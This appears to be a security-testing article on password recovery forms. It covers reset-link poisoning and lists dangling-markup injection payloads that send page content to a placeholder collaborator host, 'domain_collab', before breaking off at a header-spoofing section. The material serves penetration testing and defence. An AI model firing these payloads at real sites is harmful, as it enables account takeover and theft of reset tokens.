AppSec Tales III | Password Recovery

Application Security Testing of the Password Recovery form guidelines.

INTRODUCTION

The article describes the Application Security Testing of the Password Recovery forms to ensure a secure authentication process.
The advice in this article is based on:

• OWASP Web Security Testing Guide
• OWASP Application Security Verification Standard
• NIST recommendations
• bug bounty reports
• own experience.

I will provide a short test sample, a potential impact or an attack scenario, and a possible solution to the problem at each point.

GUIDELINES

I. PASSWORD RECOVERY LINK POISONING

Poison the domain part of the password recovery link.

• It could allow the attacker to hijack the victim user's account who clicked on the poisoned password recovery link.

Source: Own study — The testing flow of password reset poisoning (fuzzing wordlist).

DANGLING MARKUPS PAYLOADS

"><img src='//domain_collab? 
"><img src='http://domain_collab/log.php?HTML=
"><meta http-equiv="refresh" content='0; url=http://domain_collab/log.php?text=
"><meta http-equiv="refresh" content='0;URL=file://domain_collab?a=
"><table background='//domain_collab?'
"><base href='http://domain_collab/'>
"><button name=xss type=submit formaction='https://domain_collab'>I get consumed!
"><input type='hidden' name='review_body' value="
"><form action=http://domain_collab><input type="submit">Click Me</input><select name=xss><option
"><noscript><form action=http://domain_collab><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
"><script src='/search?q=a&call=alert(1)'></script>
"><html><head></head><body><script>top.window.location = "https://domain_collab/hacked.html"</script></body></html>
"><portal src='https://domain_collab?

SPOOFING HEADERS WORDLIST

Avoid using the Host header altogether in…